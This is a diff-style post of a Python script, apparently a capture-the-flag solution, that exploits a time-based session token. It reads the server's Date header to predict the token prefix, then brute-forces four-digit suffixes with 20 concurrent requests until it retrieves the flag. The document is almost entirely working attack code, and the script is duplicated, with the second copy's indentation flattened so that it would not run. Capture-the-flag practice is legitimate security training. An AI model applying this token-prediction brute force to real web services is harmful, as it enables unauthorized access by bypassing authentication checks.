Apocryphon-X · October 7, 2024 21:11
diff --git a/cybersession.py b/cybersession.py
 try:
    # pip install requests rich
    import requests
    from rich.console import Console
    from rich.progress import Progress, SpinnerColumn, TimeElapsedColumn
    from rich.traceback import install
    from rich import inspect
    from rich import print
 except ImportError as e:
    print(e, "- Is it installed?")
    exit(1)

 # -------------------------

 from datetime import datetime, timezone
 from concurrent.futures import ThreadPoolExecutor as Executor

 MAX_WORKERS = 20  # Less aggressive but still fast enough

 install(show_locals=True)
 console = Console()


 def main() -> None:
    client = requests.Session()

    entrypoint = "http://10.0.160.47"
    # Since the site uses `session_start`, we need to
    # hold our session in order to exploit the vulnerability
    initial_response = client.get(entrypoint, params={"token": "DUMMY"})

    inspect(initial_response)
    print("[yellow](i)[/] Launching exploit...")

    # The server uses the time() value to generate the token so we
    # need to extract that value to bypass token verification
    date_value = initial_response.headers["Date"]
    date_obj = datetime.strptime(date_value, "%a, %d %b %Y %H:%M:%S %Z")
    # Convert the datetime object to UTC timezone
    date_obj = date_obj.replace(tzinfo=timezone.utc)
    # Get the timestamp in seconds since the epoch
    server_timestamp = int(date_obj.timestamp())

    print(f"{date_value = }\n  -> {date_obj = }\n    -> {server_timestamp = }")

    already_found = False

    with Progress(
        SpinnerColumn(),
        *Progress.get_default_columns(),
        TimeElapsedColumn(),
        console=console,
    ) as progress:
        timer = progress.add_task(
            "[yellow] Processing...", total=None, complete_style="green"
        )

        # We define how we are going to process possible tokens
        def send_token_attempt(guess: int) -> None:
            nonlocal already_found
            if already_found:
                return

            possible_token = f"{server_timestamp}{guess}"
            console.log(f"[yellow](i)[/] Trying with token: '{possible_token}'...")
            response = client.get(entrypoint, params={"token": possible_token})
            # inspect(response)
            if "Malicious" not in response.text:
                console.log(f"[green](✓)[/] Here's your flag: [cyan]{response.text}[/]")
                already_found = True
                return

        # We need to check 8999 possible values to get our flag
        # Since we don't have all day, i'll use some concurrency
        # to speed up the process a bit
        with Executor(max_workers=MAX_WORKERS) as executor:
            for future in executor.map(send_token_attempt, range(1000, 9999 + 1)):
                # Do nothing here...
                pass

        progress.update(timer, description="[green]Completed!", total=100)
        progress.update(timer, advance=100)


 if __name__ == "__main__":
    main()
	try:
	# pip install requests rich
	import requests
	from rich.console import Console
	from rich.progress import Progress, SpinnerColumn, TimeElapsedColumn
	from rich.traceback import install
	from rich import inspect
	from rich import print
	except ImportError as e:
	print(e, "- Is it installed?")
	exit(1)

	# -------------------------

	from datetime import datetime, timezone
	from concurrent.futures import ThreadPoolExecutor as Executor

	MAX_WORKERS = 20 # Less aggressive but still fast enough

	install(show_locals=True)
	console = Console()


	def main() -> None:
	client = requests.Session()

	entrypoint = "http://10.0.160.47"
	# Since the site uses `session_start`, we need to
	# hold our session in order to exploit the vulnerability
	initial_response = client.get(entrypoint, params={"token": "DUMMY"})

	inspect(initial_response)
	print("[yellow](i)[/] Launching exploit...")

	# The server uses the time() value to generate the token so we
	# need to extract that value to bypass token verification
	date_value = initial_response.headers["Date"]
	date_obj = datetime.strptime(date_value, "%a, %d %b %Y %H:%M:%S %Z")
	# Convert the datetime object to UTC timezone
	date_obj = date_obj.replace(tzinfo=timezone.utc)
	# Get the timestamp in seconds since the epoch
	server_timestamp = int(date_obj.timestamp())

	print(f"{date_value = }\n -> {date_obj = }\n -> {server_timestamp = }")

	already_found = False

	with Progress(
	SpinnerColumn(),
	*Progress.get_default_columns(),
	TimeElapsedColumn(),
	console=console,
	) as progress:
	timer = progress.add_task(
	"[yellow] Processing...", total=None, complete_style="green"
	)

	# We define how we are going to process possible tokens
	def send_token_attempt(guess: int) -> None:
	nonlocal already_found
	if already_found:
	return

	possible_token = f"{server_timestamp}{guess}"
	console.log(f"[yellow](i)[/] Trying with token: '{possible_token}'...")
	response = client.get(entrypoint, params={"token": possible_token})
	# inspect(response)
	if "Malicious" not in response.text:
	console.log(f"[green](✓)[/] Here's your flag: [cyan]{response.text}[/]")
	already_found = True
	return

	# We need to check 8999 possible values to get our flag
	# Since we don't have all day, i'll use some concurrency
	# to speed up the process a bit
	with Executor(max_workers=MAX_WORKERS) as executor:
	for future in executor.map(send_token_attempt, range(1000, 9999 + 1)):
	# Do nothing here...
	pass

	progress.update(timer, description="[green]Completed!", total=100)
	progress.update(timer, advance=100)


	if __name__ == "__main__":
	main()